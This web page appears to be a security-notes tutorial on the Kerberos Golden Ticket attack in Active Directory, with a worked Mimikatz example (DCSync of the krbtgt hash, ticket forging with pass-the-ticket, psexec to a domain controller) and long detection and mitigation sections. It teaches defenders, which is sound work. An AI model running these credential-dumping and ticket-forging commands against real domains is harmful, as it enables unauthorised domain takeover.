<!doctype html>
<html lang="en" dir="ltr" class="docs-wrapper plugin-docs plugin-id-default docs-version-current docs-doc-page docs-doc-id-active_directory/kerberos/golden-ticket-attack" data-has-hydrated="false">
<head>
<meta charset="UTF-8">
<meta name="generator" content="Docusaurus v3.8.1">
<title data-rh="true">Golden Ticket | elodvk</title><meta data-rh="true" name="viewport" content="width=device-width,initial-scale=1"><meta data-rh="true" name="twitter:card" content="summary_large_image"><meta data-rh="true" property="og:image" content="https://elodvk.github.io/img/docusaurus-social-card.jpg"><meta data-rh="true" name="twitter:image" content="https://elodvk.github.io/img/docusaurus-social-card.jpg"><meta data-rh="true" property="og:url" content="https://elodvk.github.io/docs/active_directory/kerberos/golden-ticket-attack"><meta data-rh="true" property="og:locale" content="en"><meta data-rh="true" name="docusaurus_locale" content="en"><meta data-rh="true" name="docsearch:language" content="en"><meta data-rh="true" name="docusaurus_version" content="current"><meta data-rh="true" name="docusaurus_tag" content="docs-default-current"><meta data-rh="true" name="docsearch:version" content="current"><meta data-rh="true" name="docsearch:docusaurus_tag" content="docs-default-current"><meta data-rh="true" property="og:title" content="Golden Ticket | elodvk"><meta data-rh="true" name="description" content="Disclaimer: This information is provided for educational purposes only. Attempting these techniques on systems you do not have explicit, authorized permission to test is illegal and unethical. Always operate within legal and ethical boundaries."><meta data-rh="true" property="og:description" content="Disclaimer: This information is provided for educational purposes only. Attempting these techniques on systems you do not have explicit, authorized permission to test is illegal and unethical. Always operate within legal and ethical boundaries."><link data-rh="true" rel="icon" href="/img/favicon.ico"><link data-rh="true" rel="canonical" href="https://elodvk.github.io/docs/active_directory/kerberos/golden-ticket-attack"><link data-rh="true" rel="alternate" href="https://elodvk.github.io/docs/active_directory/kerberos/golden-ticket-attack" hreflang="en"><link data-rh="true" rel="alternate" href="https://elodvk.github.io/docs/active_directory/kerberos/golden-ticket-attack" hreflang="x-default"><script data-rh="true" type="application/ld+json">{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Active Directory","item":"https://elodvk.github.io/docs/category/active-directory-1"},{"@type":"ListItem","position":2,"name":"Kerberos","item":"https://elodvk.github.io/docs/category/kerberos-1"},{"@type":"ListItem","position":3,"name":"Golden Ticket","item":"https://elodvk.github.io/docs/active_directory/kerberos/golden-ticket-attack"}]}</script><link rel="alternate" type="application/rss+xml" href="/blog/rss.xml" title="elodvk RSS Feed">
<link rel="alternate" type="application/atom+xml" href="/blog/atom.xml" title="elodvk Atom Feed"><link rel="stylesheet" href="/assets/css/styles.d0424f89.css">
<script src="/assets/js/runtime~main.1a379adf.js" defer="defer"></script>
<script src="/assets/js/main.ccb88605.js" defer="defer"></script>
</head>
<body class="navigation-with-keyboard">
<svg xmlns="http://www.w3.org/2000/svg" style="display: none;"><defs>
<symbol id="theme-svg-external-link" viewBox="0 0 24 24"><path fill="currentColor" d="M21 13v10h-21v-19h12v2h-10v15h17v-8h2zm3-12h-10.988l4.035 4-6.977 7.07 2.828 2.828 6.977-7.07 4.125 4.172v-11z"/></symbol>
</defs></svg>
<script>!function(){var t="light";var e=function(){try{return new URLSearchParams(window.location.search).get("docusaurus-theme")}catch(t){}}()||function(){try{return window.localStorage.getItem("theme")}catch(t){}}();document.documentElement.setAttribute("data-theme",e||t),document.documentElement.setAttribute("data-theme-choice",e||t)}(),function(){try{const c=new URLSearchParams(window.location.search).entries();for(var[t,e]of c)if(t.startsWith("docusaurus-data-")){var a=t.replace("docusaurus-data-","data-");document.documentElement.setAttribute(a,e)}}catch(t){}}()</script><div id="__docusaurus"><link rel="preload" as="image" href="/img/logo.svg"><div role="region" aria-label="Skip to main content"><a class="skipToContent_fXgn" href="#__docusaurus_skipToContent_fallback">Skip to main content</a></div><nav aria-label="Main" class="theme-layout-navbar navbar navbar--fixed-top"><div class="navbar__inner"><div class="theme-layout-navbar-left navbar__items"><button aria-label="Toggle navigation bar" aria-expanded="false" class="navbar__toggle clean-btn" type="button"><svg width="30" height="30" viewBox="0 0 30 30" aria-hidden="true"><path stroke="currentColor" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" d="M4 7h22M4 15h22M4 23h22"></path></svg></button><a class="navbar__brand" href="/"><div class="navbar__logo"><img src="/img/logo.svg" alt="My Site Logo" class="themedComponent_mlkZ themedComponent--light_NVdE"><img src="/img/logo.svg" alt="My Site Logo" class="themedComponent_mlkZ themedComponent--dark_xIcU"></div><b class="navbar__title text--truncate">elodvk</b></a><a class="navbar__item navbar__link" href="/docs/category/active-directory">Docs</a><a class="navbar__item navbar__link" href="/blog">Blog</a><a class="navbar__item navbar__link" href="/about_me">About Me</a></div><div class="theme-layout-navbar-right navbar__items navbar__items--right"><a href="https://github.com/elodvk" target="_blank" rel="noopener noreferrer" class="navbar__item navbar__link">GitHub<svg width="13.5" height="13.5" aria-hidden="true" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a><div class="toggle_vylO colorModeToggle_DEke"><button class="clean-btn toggleButton_gllP toggleButtonDisabled_aARS" type="button" disabled="" title="system mode" aria-label="Switch between dark and light mode (currently system mode)"><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP lightToggleIcon_pyhR"><path fill="currentColor" d="M12,9c1.65,0,3,1.35,3,3s-1.35,3-3,3s-3-1.35-3-3S10.35,9,12,9 M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5 S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1 s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0 c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95 c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41 L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41 s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06 c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP darkToggleIcon_wfgR"><path fill="currentColor" d="M9.37,5.51C9.19,6.15,9.1,6.82,9.1,7.5c0,4.08,3.32,7.4,7.4,7.4c0.68,0,1.35-0.09,1.99-0.27C17.45,17.19,14.93,19,12,19 c-3.86,0-7-3.14-7-7C5,9.07,6.81,6.55,9.37,5.51z M12,3c-4.97,0-9,4.03-9,9s4.03,9,9,9s9-4.03,9-9c0-0.46-0.04-0.92-0.1-1.36 c-0.98,1.37-2.58,2.26-4.4,2.26c-2.98,0-5.4-2.42-5.4-5.4c0-1.81,0.89-3.42,2.26-4.4C12.92,3.04,12.46,3,12,3L12,3z"></path></svg><svg viewBox="0 0 24 24" width="24" height="24" aria-hidden="true" class="toggleIcon_g3eP systemToggleIcon_QzmC"><path fill="currentColor" d="m12 21c4.971 0 9-4.029 9-9s-4.029-9-9-9-9 4.029-9 9 4.029 9 9 9zm4.95-13.95c1.313 1.313 2.05 3.093 2.05 4.95s-0.738 3.637-2.05 4.95c-1.313 1.313-3.093 2.05-4.95 2.05v-14c1.857 0 3.637 0.737 4.95 2.05z"></path></svg></button></div><div class="navbarSearchContainer_Bca1"></div></div></div><div role="presentation" class="navbar-sidebar__backdrop"></div></nav><div id="__docusaurus_skipToContent_fallback" class="theme-layout-main main-wrapper mainWrapper_z2l0"><div class="docsWrapper_hBAB"><button aria-label="Scroll back to top" class="clean-btn theme-back-to-top-button backToTopButton_sjWU" type="button"></button><div class="docRoot_UBD9"><aside class="theme-doc-sidebar-container docSidebarContainer_YfHR"><div class="sidebarViewport_aRkj"><div class="sidebar_njMd"><nav aria-label="Docs sidebar" class="menu thin-scrollbar menu_SIkG"><ul class="theme-doc-sidebar-menu menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--active" href="/docs/category/active-directory-1">Active Directory</a><button aria-label="Collapse sidebar category &#x27;Active Directory&#x27;" aria-expanded="true" type="button" class="clean-btn menu__caret"></button></div><ul class="menu__list"><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist menu__link--active" tabindex="0" href="/docs/category/kerberos-1">Kerberos</a><button aria-label="Collapse sidebar category &#x27;Kerberos&#x27;" aria-expanded="true" type="button" class="clean-btn menu__caret"></button></div><ul class="menu__list"><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link menu__link--active" aria-current="page" tabindex="0" href="/docs/active_directory/kerberos/golden-ticket-attack">Golden Ticket</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/active_directory/kerberos/intro">Introduction</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/active_directory/kerberos/kerberoasting">Kerberoasting</a></li><li class="theme-doc-sidebar-item-link theme-doc-sidebar-item-link-level-3 menu__list-item"><a class="menu__link" tabindex="0" href="/docs/active_directory/kerberos/silver-ticket-attack">Silver Ticket</a></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-2 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" tabindex="0" href="/docs/category/ad-cs-1">AD CS</a><button aria-label="Expand sidebar category &#x27;AD CS&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li></ul></li><li class="theme-doc-sidebar-item-category theme-doc-sidebar-item-category-level-1 menu__list-item menu__list-item--collapsed"><div class="menu__list-item-collapsible"><a class="menu__link menu__link--sublist" href="/docs/category/tools--techniques-1">Tools &amp; Techniques</a><button aria-label="Expand sidebar category &#x27;Tools &amp; Techniques&#x27;" aria-expanded="false" type="button" class="clean-btn menu__caret"></button></div></li></ul></nav></div></div></aside><main class="docMainContainer_TBSr"><div class="container padding-top--md padding-bottom--lg"><div class="row"><div class="col docItemCol_VOVn"><div class="docItemContainer_Djhp"><article><nav class="theme-doc-breadcrumbs breadcrumbsContainer_Z_bl" aria-label="Breadcrumbs"><ul class="breadcrumbs"><li class="breadcrumbs__item"><a aria-label="Home page" class="breadcrumbs__link" href="/"><svg viewBox="0 0 24 24" class="breadcrumbHomeIcon_YNFT"><path d="M10 19v-5h4v5c0 .55.45 1 1 1h3c.55 0 1-.45 1-1v-7h1.7c.46 0 .68-.57.33-.87L12.67 3.6c-.38-.34-.96-.34-1.34 0l-8.36 7.53c-.34.3-.13.87.33.87H5v7c0 .55.45 1 1 1h3c.55 0 1-.45 1-1z" fill="currentColor"></path></svg></a></li><li class="breadcrumbs__item"><a class="breadcrumbs__link" href="/docs/category/active-directory-1"><span>Active Directory</span></a></li><li class="breadcrumbs__item"><a class="breadcrumbs__link" href="/docs/category/kerberos-1"><span>Kerberos</span></a></li><li class="breadcrumbs__item breadcrumbs__item--active"><span class="breadcrumbs__link">Golden Ticket</span></li></ul></nav><div class="tocCollapsible_ETCw theme-doc-toc-mobile tocMobile_ITEo"><button type="button" class="clean-btn tocCollapsibleButton_TO0P">On this page</button></div><div class="theme-doc-markdown markdown"><header><h1>Golden Ticket</h1></header><p><strong>Disclaimer:</strong> This information is provided for educational purposes only. Attempting these techniques on systems you do not have explicit, authorized permission to test is illegal and unethical. Always operate within legal and ethical boundaries.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="1-introduction">1. Introduction<a href="#1-introduction" class="hash-link" aria-label="Direct link to 1. Introduction" title="Direct link to 1. Introduction">​</a></h2>
<p>A Golden Ticket attack is a powerful post-exploitation technique used in Microsoft Active Directory (AD) environments. It allows an attacker who has already compromised high-level privileges (typically Domain Admin or equivalent) to forge Kerberos Ticket Granting Tickets (TGTs) for <em>any</em> user in the domain, including non-existent ones. This grants the attacker persistent, long-term, and often difficult-to-detect access to domain resources, effectively making them a Domain Admin (or any other user they choose) for as long as the underlying credential used to create the ticket remains valid.</p>
<p>The attack leverages fundamental aspects of the Kerberos authentication protocol by compromising the master key of the domain&#x27;s Kerberos service: the NTLM hash of the <code>krbtgt</code> account.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="2-background-kerberos-authentication-simplified">2. Background: Kerberos Authentication (Simplified)<a href="#2-background-kerberos-authentication-simplified" class="hash-link" aria-label="Direct link to 2. Background: Kerberos Authentication (Simplified)" title="Direct link to 2. Background: Kerberos Authentication (Simplified)">​</a></h2>
<p>To understand the Golden Ticket, you need a basic grasp of Kerberos:</p>
<ol>
<li><strong>Authentication Service (AS) Exchange:</strong> A user logs in. Their client requests a TGT from the Key Distribution Center&#x27;s (KDC) Authentication Service. The KDC verifies the user&#x27;s credentials (using their password hash) and issues an encrypted TGT. The TGT contains information about the user (like their SID and group memberships) and is encrypted with the <code>krbtgt</code> account&#x27;s NTLM hash.</li>
<li><strong>Ticket Granting Service (TGS) Exchange:</strong> When the user wants to access a specific service (e.g., a file share), their client presents the TGT to the KDC&#x27;s Ticket Granting Service. The TGS validates the TGT (by decrypting it with the <code>krbtgt</code> hash) and issues a Service Ticket (ST) specific to the requested service. The ST is encrypted with the service account&#x27;s password hash.</li>
<li><strong>Application Server (AP) Exchange:</strong> The client presents the ST to the application server hosting the service. The server decrypts the ST (using its own hash) and grants access based on the validated user information within the ticket.</li>
</ol>
<p>The <strong>TGT</strong> is crucial because it authenticates the user to the KDC for obtaining further Service Tickets without needing to re-enter credentials constantly.</p>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="3-the-krbtgt-account">3. The <code>krbtgt</code> Account<a href="#3-the-krbtgt-account" class="hash-link" aria-label="Direct link to 3-the-krbtgt-account" title="Direct link to 3-the-krbtgt-account">​</a></h2>
<ul>
<li>This is a built-in, disabled user account in Active Directory.</li>
<li>Its primary purpose is to act as the service account for the KDC.</li>
<li>The NTLM password hash of this account is used by the KDC to encrypt and decrypt TGTs.</li>
<li><strong>Crucially, compromising the NTLM hash of the <code>krbtgt</code> account allows anyone possessing it to create valid TGTs.</strong></li>
</ul>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="4-how-the-golden-ticket-attack-works">4. How the Golden Ticket Attack Works<a href="#4-how-the-golden-ticket-attack-works" class="hash-link" aria-label="Direct link to 4. How the Golden Ticket Attack Works" title="Direct link to 4. How the Golden Ticket Attack Works">​</a></h2>
<p>The attack flow typically involves these steps:</p>
<ol>
<li><strong>Initial Compromise:</strong> The attacker must first gain high-level privileges within the domain, usually Domain Administrator rights or equivalent privileges allowing them to run code on a Domain Controller (DC) or extract credentials remotely. This is a prerequisite, not part of the Golden Ticket attack itself.</li>
<li><strong>Extract <code>krbtgt</code> Hash:</strong> The attacker uses tools to extract the NTLM hash of the <code>krbtgt</code> account from a Domain Controller&#x27;s memory (LSASS process) or the AD database (<code>ntds.dit</code>).</li>
<li><strong>Gather Domain Information:</strong> The attacker needs the Domain Name and the Domain Security Identifier (SID).</li>
<li><strong>Forge the TGT (Create the Golden Ticket):</strong> Using specialized tools (like Mimikatz), the attacker constructs a fake TGT. They can specify:<!-- -->
<ul>
<li>The username to impersonate (can be <em>any</em> user, even fake ones).</li>
<li>The Domain Name and SID.</li>
<li>The target user&#x27;s desired User ID (RID - often <code>500</code> for the built-in Administrator).</li>
<li>Desired group memberships (e.g., Domain Admins, Enterprise Admins).</li>
<li>Ticket lifetime (can be set to years, e.g., 10 years is common).</li>
<li>The extracted <code>krbtgt</code> NTLM hash (used to encrypt the ticket).</li>
</ul>
</li>
<li><strong>Inject/Use the Ticket:</strong> The attacker injects the forged TGT into their current logon session&#x27;s memory.</li>
<li><strong>Access Resources:</strong> With the injected Golden Ticket, the attacker&#x27;s machine can now request Service Tickets from the TGS for any service in the domain, appearing as the user specified in the forged TGT (e.g., Domain Administrator). They can access any resource that user is authorized to access (file shares, remote command execution, DCs, etc.).</li>
</ol>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="5-tools">5. Tools<a href="#5-tools" class="hash-link" aria-label="Direct link to 5. Tools" title="Direct link to 5. Tools">​</a></h2>
<ul>
<li><strong>Mimikatz:</strong> The quintessential tool for Golden Ticket attacks, developed by Benjamin Delpy. It can extract hashes and forge tickets.</li>
<li><strong>Impacket:</strong> A collection of Python classes for working with network protocols. Scripts like <code>secretsdump.py</code> can remotely extract hashes (including <code>krbtgt</code>), and <code>ticketer.py</code> can forge tickets. Useful for Linux-based attackers.</li>
<li><strong>Rubeus:</strong> A C# toolset for raw Kerberos interaction and abuse. It can perform DCSync to get the hash and forge/use tickets.</li>
</ul>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="6-example-scenario-using-mimikatz-on-a-compromised-machine">6. Example Scenario (using Mimikatz on a compromised machine)<a href="#6-example-scenario-using-mimikatz-on-a-compromised-machine" class="hash-link" aria-label="Direct link to 6. Example Scenario (using Mimikatz on a compromised machine)" title="Direct link to 6. Example Scenario (using Mimikatz on a compromised machine)">​</a></h2>
<p><strong>Assumptions:</strong></p>
<ul>
<li>Attacker has Domain Admin rights and is running commands on a compromised machine within the domain (or directly on a DC).</li>
<li>Target Domain: <code>contoso.local</code></li>
</ul>
<p><strong>Steps:</strong></p>
<ol>
<li>
<p><strong>Elevate Privileges:</strong> Ensure Mimikatz is run with Administrator privileges.</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># In Mimikatz console</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">privilege::debug</span><br></span></code></pre></div></div>
</li>
<li>
<p><strong>Extract <code>krbtgt</code> Hash and Domain SID:</strong>
The easiest way (if you have the rights) is DCSync, which mimics domain replication behavior.</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># In Mimikatz console</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">lsadump::dcsync /domain:contoso.local /user:krbtgt</span><br></span></code></pre></div></div>
<p>This will output information about the <code>krbtgt</code> account, including:</p>
<ul>
<li>The Domain SID (e.g., <code>S-1-5-21-xxxxxxxxxx-yyyyyyyyyy-zzzzzzzzzz</code>)</li>
<li>The NTLM hash (e.g., <code>abcdef1234567890abcdef1234567890</code>)</li>
</ul>
<p><em>Alternatively, if running directly on a DC:</em></p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># In Mimikatz console</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># (Optional: Patch LSASS if needed, may trigger AV/EDR)</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># misc::memssp</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># (Extract from LSASS memory)</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">sekurlsa::krbtgt</span><br></span></code></pre></div></div>
<p><em>Or obtain the <code>ntds.dit</code> file offline and extract it.</em></p>
</li>
<li>
<p><strong>Forge the Golden Ticket:</strong>
Let&#x27;s forge a ticket for the user &quot;Administrator&quot; (RID 500), making them a member of Domain Admins (RID 512), Enterprise Admins (RID 519), etc.</p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># In Mimikatz console</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-xxxxxxxxxx-yyyyyyyyyy-zzzzzzzzzz /krbtgt:abcdef1234567890abcdef1234567890 /id:500 /groups:512,519 /ptt</span><br></span></code></pre></div></div>
<ul>
<li><code>/user</code>: The username to impersonate.</li>
<li><code>/domain</code>: The target domain name.</li>
<li><code>/sid</code>: The domain SID (obtained in step 2).</li>
<li><code>/krbtgt</code>: The NTLM hash of the <code>krbtgt</code> account (obtained in step 2).</li>
<li><code>/id</code>: The Relative Identifier (RID) of the user to impersonate. <code>500</code> is typically the built-in Administrator.</li>
<li><code>/groups</code> (Optional): Comma-separated RIDs of groups to add to the ticket (e.g., <code>512</code>=Domain Admins, <code>519</code>=Enterprise Admins). Defaults usually include key admin groups.</li>
<li><code>/ptt</code>: Pass-the-Ticket. Injects the forged ticket directly into the current session&#x27;s memory. Alternatively, use <code>/ticket:golden.kirbi</code> to save it to a file.</li>
</ul>
</li>
<li>
<p><strong>Verify and Use the Ticket:</strong></p>
<div class="language-powershell codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-powershell codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># In Mimikatz console</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">kerberos::list</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># Look for the newly injected ticket</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># From a regular command prompt or PowerShell window (same session)</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">klist</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># Verify the ticket is present</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># Access a protected resource on a Domain Controller (e.g., DC01)</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">dir \\DC01\c$</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># Try running commands remotely</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">psexec \\DC01 cmd.exe</span><br></span></code></pre></div></div>
<p>If successful, you now have access as if you were the Administrator user defined in the ticket, regardless of the user you are actually logged in as on the compromised machine.</p>
</li>
</ol>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="7-detection">7. Detection<a href="#7-detection" class="hash-link" aria-label="Direct link to 7. Detection" title="Direct link to 7. Detection">​</a></h2>
<p>Detecting Golden Tickets is challenging because forged tickets appear legitimate to the KDC (they are correctly encrypted). Detection relies on finding anomalies and monitoring for prerequisites:</p>
<ol>
<li><strong>Monitor <code>krbtgt</code> Account Changes:</strong> The <code>krbtgt</code> password should <em>never</em> change outside of a deliberate, planned rotation process. Event ID <code>4724</code> (An attempt was made to reset an account&#x27;s password) for the <code>krbtgt</code> account is highly suspicious if unplanned.</li>
<li><strong>Monitor for DCSync Activity:</strong> Look for network traffic patterns indicative of DCSync (<code>DRSUAPI</code> replication requests) originating from non-DC machines or unexpected accounts. Event ID <code>4662</code> (An operation was performed on an object) on the domain root object for specific replication rights (<code>DS-Replication-Get-Changes</code>, <code>DS-Replication-Get-Changes-All</code>) can indicate DCSync attempts.</li>
<li><strong>Analyze Kerberos Ticket Properties (Advanced):</strong>
<ul>
<li><strong>Ticket Lifetime:</strong> Golden Tickets often have unusually long lifetimes (e.g., 10 years default in Mimikatz) compared to standard domain policy (e.g., 10 hours). Monitor Event ID <code>4769</code> (A Kerberos service ticket was requested) for tickets with excessive lifetimes.</li>
<li><strong>Encryption Types:</strong> Forged tickets might use older/weaker encryption algorithms (like RC4-HMAC) if the attacker doesn&#x27;t specify otherwise, especially if newer ones like AES are standard in the domain.</li>
<li><strong>SID History Anomalies:</strong> Attackers might inject SIDs into the SID History field of the ticket to gain extra privileges. Monitor for unexpected SIDs there.</li>
<li><strong>Account Anomalies:</strong> TGTs issued for disabled or non-existent accounts.</li>
</ul>
</li>
<li><strong>Endpoint Detection and Response (EDR):</strong> Monitor for execution of tools like <code>Mimikatz</code>, <code>Rubeus</code>, or suspicious PowerShell commands related to credential dumping or Kerberos ticket manipulation (<code>sekurlsa::</code>, <code>lsadump::</code>, <code>kerberos::</code>). Look for direct access to the LSASS process memory.</li>
<li><strong>Network Traffic Analysis:</strong> Look for Kerberos traffic originating from unusual sources or showing anomalous patterns. TGT requests (<code>AS-REQ</code>) should normally only come when a user logs on or needs to renew their TGT. Frequent Service Ticket requests (<code>TGS-REQ</code>) without preceding TGT requests might indicate an injected ticket.</li>
<li><strong>Log Correlation (SIEM/UEBA):</strong> Correlate login events (Event ID <code>4624</code>), service ticket requests (<code>4769</code>), and resource access logs. User and Entity Behavior Analytics (UEBA) can help baseline normal activity and flag deviations potentially indicative of a Golden Ticket (e.g., an &quot;admin&quot; account suddenly active from a user workstation it never used before).</li>
</ol>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="8-prevention-and-mitigation">8. Prevention and Mitigation<a href="#8-prevention-and-mitigation" class="hash-link" aria-label="Direct link to 8. Prevention and Mitigation" title="Direct link to 8. Prevention and Mitigation">​</a></h2>
<p>Preventing the <em>creation</em> of a Golden Ticket hinges on protecting the <code>krbtgt</code> hash. Mitigating its <em>impact</em> involves limiting the attacker&#x27;s ability to use it and detecting it quickly.</p>
<ol>
<li><strong>Protect Domain Controllers:</strong> DCs are the crown jewels.<!-- -->
<ul>
<li><strong>Strict Access Control:</strong> Limit who can log onto DCs (physically and remotely). Use jump servers/Privileged Access Workstations (PAWs).</li>
<li><strong>Patching and Hardening:</strong> Keep DCs fully patched and securely configured. Disable legacy protocols. Use firewalls.</li>
</ul>
</li>
<li><strong>Limit Domain Admin Accounts:</strong> The fewer accounts with the ability to compromise a DC, the better. Follow the principle of least privilege. Use Tiered Administration models.</li>
<li><strong>Privileged Access Management (PAM):</strong> Implement PAM solutions to manage and monitor privileged account usage, providing just-in-time (JIT) access.</li>
<li><strong>Credential Guard (Windows 10/Server 2016+):</strong> Helps protect LSASS memory from credential dumping techniques using virtualization-based security (VBS). This makes extracting the <code>krbtgt</code> hash (and other credentials) from memory much harder.</li>
<li><strong>Regularly Rotate <code>krbtgt</code> Password:</strong> This is the <em>most direct</em> countermeasure.<!-- -->
<ul>
<li><strong>Procedure:</strong> The password must be changed <strong>TWICE</strong> with a delay between changes (e.g., &gt;10-24 hours, longer than the domain&#x27;s max ticket lifetime).</li>
<li><strong>Why Twice?</strong> AD keeps the current and previous <code>krbtgt</code> password hash to validate existing tickets. Changing it once invalidates tickets created with the <em>oldest</em> hash but allows tickets created with the <em>previous</em> hash to still work. The second change purges the hash the attacker likely possesses, invalidating any Golden Tickets created with it.</li>
<li><strong>Caution:</strong> This is a significant operation. Plan carefully as it invalidates all existing TGTs, potentially causing temporary disruption if not managed well. Perform during a maintenance window. Microsoft provides scripts to assist (<code>Reset-KrbTgtPassword.ps1</code>).</li>
</ul>
</li>
<li><strong>Monitoring and Detection:</strong> Implement the detection strategies outlined above (EDR, SIEM, UEBA, specific event log monitoring).</li>
<li><strong>Reduce Kerberos Delegation:</strong> Limit the use of Unconstrained Delegation, which can expose TGTs. Use Constrained or Resource-Based Constrained Delegation where possible.</li>
<li><strong>Enable AES Encryption for Kerberos:</strong> Configure AD to support and prefer AES128/AES256 encryption for Kerberos. Ensure the <code>krbtgt</code> account itself supports AES (requires domain functional level 2008 or higher and potentially manual steps). This makes RC4-based attacks less likely.</li>
</ol>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="9-conclusion">9. Conclusion<a href="#9-conclusion" class="hash-link" aria-label="Direct link to 9. Conclusion" title="Direct link to 9. Conclusion">​</a></h2>
